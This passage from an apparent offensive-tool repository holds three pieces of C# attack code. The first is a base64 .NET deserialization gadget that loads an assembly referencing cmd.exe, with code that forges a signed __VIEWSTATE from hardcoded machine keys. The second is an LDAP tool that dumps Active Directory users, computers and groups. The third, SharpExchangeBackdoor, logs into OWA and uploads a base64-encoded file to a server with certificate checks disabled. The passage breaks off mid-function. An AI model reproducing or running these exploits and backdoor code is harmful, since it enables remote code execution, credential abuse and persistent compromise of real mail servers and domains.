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b249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBAAAAAHAAAACQMAAAAKCSQAAAAKCAgAAAAACggIAQAAAAERAAAADwAAAAYlAAAA9QJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBIAAAAHAAAACQQAAAAKCSgAAAAKCAgAAAAACggIAQAAAAETAAAADwAAAAYpAAAA3wNTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAUAAAABwAAAAkFAAAACgksAAAACggIAAAAAAoICAEAAAABFQAAAA8AAAAGLQAAAOYCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAWAAAABwAAAAkGAAAACTAAAAAJMQAAAAoICAAAAAAKCAgBAAAAARcAAAAPAAAABjIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBgAAAAHAAAACQcAAAAKCTUAAAAKCAgAAAAACggIAQAAAAEZAAAADwAAAAY2AAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAY3AAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBoAAAAHAAAACQgAAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABGwAAAA8AAAAGOQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGOgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBwAAAAFAAAADQIJOwAAAAgIAwAAAAkLAAAAAR0AAAAPAAAABj0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGPgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHgAAAAEAAAAJCQAAABAfAAAAAgAAAAkKAAAACQoAAAAQIAAAAAIAAAAGQQAAAAAJQQAAAAQkAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXICAAAACERlbGVnYXRlB21ldGhvZDADAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJQgAAAAlDAAAAASgAAAAkAAAACUQAAAAJRQAAAAEsAAAAJAAAAAlGAAAACUcAAAABMAAAACQAAAAJSAAAAAlJAAAAATEAAAAkAAAACUoAAAAJSwAAAAE1AAAAJAAAAAlMAAAACU0AAAABOwAAAAQAAAAJTgAAAAlPAAAABEIAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGUAAAANUBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGUgAAABpTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseQZTAAAABExvYWQKBEMAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCVMAAAAJPgAAAAlSAAAABlYAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pBlcAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChTeXN0ZW0uQnl0ZVtdKQgAAAAKAUQAAABCAAAABlgAAADMAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAJUgAAAAZbAAAACEdldFR5cGVzCgFFAAAAQwAAAAlbAAAACT4AAAAJUgAAAAZeAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQZfAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABmAAAAC2A1N5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZjAAAADUdldEVudW1lcmF0b3IKAUcAAABDAAAACWMAAAAJPgAAAAliAAAABmYAAABFU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtTeXN0ZW0uVHlwZV0gR2V0RW51bWVyYXRvcigpBmcAAACUAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSBHZXRFbnVtZXJhdG9yKCkIAAAACgFIAAAAQgAAAAZoAAAAwAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Cb29sZWFuLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmoAAAAeU3lzdGVtLkNvbGxlY3Rpb25zLklFbnVtZXJhdG9yBmsAAAAITW92ZU5leHQKAUkAAABDAAAACWsAAAAJPgAAAAlqAAAABm4AAAASQm9vbGVhbiBNb3ZlTmV4dCgpBm8AAAAZU3lzdGVtLkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABnAAAAC9AlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGcgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBnMAAAALZ2V0X0N1cnJlbnQKAUsAAABDAAAACXMAAAAJPgAAAAlyAAAABnYAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQZ3AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkIAAAACgFMAAAAQgAAAAZ4AAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZ6AAAAEFN5c3RlbS5BY3RpdmF0b3IGewAAAA5DcmVhdGVJbnN0YW5jZQoBTQAAAEMAAAAJewAAAAk+AAAACXoAAAAGfgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZ/AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGgAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAmCAAAACAgAIAAABIIAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcLCw=="; 50 | 51 | Console.WriteLine(xaml_payload); 52 | Console.WriteLine("================"); 53 | byte[] payload = System.Convert.FromBase64String(xaml_payload); 54 | string data = CreateViewState(payload, "042A94E8", "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"); 55 | Console.WriteLine("__VIEWSTATE="); 56 | Console.WriteLine(data); 57 | } 58 | } 59 | } 60 | 61 | -------------------------------------------------------------------------------- /SharpADFindDemo.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace SharpADFindDemo 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | SharpADFindDemo 15 | Use to export the AD data by LDAP. 16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | SharpADFindDemo 22 | command: 23 | - user 24 | - machine 25 | - group 26 | - ou 27 | - username 28 | - machinename 29 | - groupname 30 | - ouname 31 | Note:The maxsize is 1000. 32 | Eg: 33 | SharpADFindDemo.exe 192.168.1.1 test1 password1 user 34 | "; 35 | Console.WriteLine(Usage); 36 | } 37 | 38 | 39 | static void Main(string[] args) 40 | { 41 | if (args.Length != 4) 42 | { 43 | ShowUsage(); 44 | System.Environment.Exit(0); 45 | } 46 | try 47 | { 48 | string q = null; 49 | if (args[3] == "user" || args[3] == "username") 50 | q = "(&(objectCategory=person))"; 51 | else if(args[3] == "machine" || args[3] == "machinename") 52 | q = "(&(objectCategory=computer))"; 53 | else if(args[3] == "group" || args[3] == "groupname") 54 | q = "(&(objectCategory=group))"; 55 | else if(args[3] == "ou" || args[3] == "ouname") 56 | q = "(&(objectCategory=organizationalUnit))"; 57 | else 58 | { 59 | Console.WriteLine("[!] Wrong parameter"); 60 | System.Environment.Exit(0); 61 | } 62 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 63 | Console.WriteLine("[*] Querying: {0}", q); 64 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 65 | DirectorySearcher ds = new DirectorySearcher(de); 66 | ds.Filter = q; 67 | SearchResultCollection rs = ds.FindAll(); 68 | foreach (SearchResult r in rs) 69 | { 70 | if(args[3].Contains("name")) 71 | Console.WriteLine(r.GetDirectoryEntry().Name.ToString()); 72 | else 73 | { 74 | ResultPropertyCollection rprops = r.Properties; 75 | string prop = null; 76 | foreach (string name in rprops.PropertyNames) 77 | { 78 | foreach (object vl in rprops[name]) 79 | { 80 | prop = name + ":" + vl.ToString(); 81 | Console.WriteLine(prop); 82 | } 83 | } 84 | Console.WriteLine("-----"); 85 | } 86 | } 87 | Console.WriteLine("Total:"+rs.Count); 88 | } 89 | catch (Exception e) 90 | { 91 | Console.WriteLine("[!] ERROR: {0}", e.Message); 92 | } 93 | } 94 | } 95 | } -------------------------------------------------------------------------------- /SharpExchangeBackdoor.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Net; 4 | using System.IO; 5 | using System.Web; 6 | 7 | namespace SharpExchangeBackdoor 8 | { 9 | public class Program 10 | { 11 | public static string HttpPostData(string url, string path) 12 | { 13 | Console.WriteLine("[*] Try to read: " + path); 14 | byte[] buffer = System.IO.File.ReadAllBytes(path); 15 | string base64str = Convert.ToBase64String(buffer); 16 | 17 | Console.WriteLine("[*] Try to access: " + url); 18 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 19 | HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest; 20 | request.Method = "POST"; 21 | request.ContentType = "application/x-www-form-urlencoded"; 22 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 23 | 24 | string Param = "demodata=" + HttpUtility.UrlEncode(base64str); 25 | byte[] post=Encoding.UTF8.GetBytes(Param); 26 | Stream postStream = request.GetRequestStream(); 27 | postStream.Write(post,0,post.Length); 28 | postStream.Close(); 29 | 30 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 31 | Stream instream = response.GetResponseStream(); 32 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 33 | string content = sr.ReadToEnd(); 34 | return content; 35 | } 36 | 37 | public static string HttpPostDataAuth(string url, string username, string password, string path) 38 | { 39 | string[] sArray = url.Split('/'); 40 | string newurl = "https://" + sArray[2] + "/owa/auth.owa"; 41 | Console.WriteLine("[*] Try to login"); 42 | 43 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 44 | HttpWebRequest request = WebRequest.Create(newurl) as HttpWebRequest; 45 | request.AllowAutoRedirect = false; 46 | request.Method = "POST"; 47 | request.ContentType = "application/x-www-form-urlencoded"; 48 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 49 | 50 | string Param = "destination=https%3A%2F%2F" + sArray[2] + "%2Fecp%2F&flags=4&forcedownlevel=0&username="+HttpUtility.UrlEncode(username)+"&password="+HttpUtility.UrlEncode(password)+"&passwordText=&isUtf8=1"; 51 | byte[] post=Encoding.UTF8.GetBytes(Param); 52 | 53 | Stream postStream = request.GetRequestStream(); 54 | postStream.Write(post,0,post.Length); 55 | postStream.Close(); 56 | 57 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 58 | if(response.StatusCode!=(HttpStatusCode)302) 59 | { 60 | Console.WriteLine("[!] Bad login response"); 61 | System.Environment.Exit(0); 62 | } 63 | 64 | string cookie = ""; 65 | if(response.Headers.GetValues("Set-Cookie")!=null) 66 | { 67 | foreach(string s in response.Headers.GetValues("Set-Cookie")) 68 | { 69 | cookie+=s.Split(' ')[0]+" "; 70 | } 71 | } 72 | 73 | if(cookie.IndexOf("cadataKey") == -1) 74 | { 75 | Console.WriteLine("[-] Wrong password"); 76 | System.Environment.Exit(0); 77 | } 78 | Console.WriteLine("[+] Login success"); 79 | 80 | Console.WriteLine("[*] Try to read: " + path); 81 | byte[] buffer = 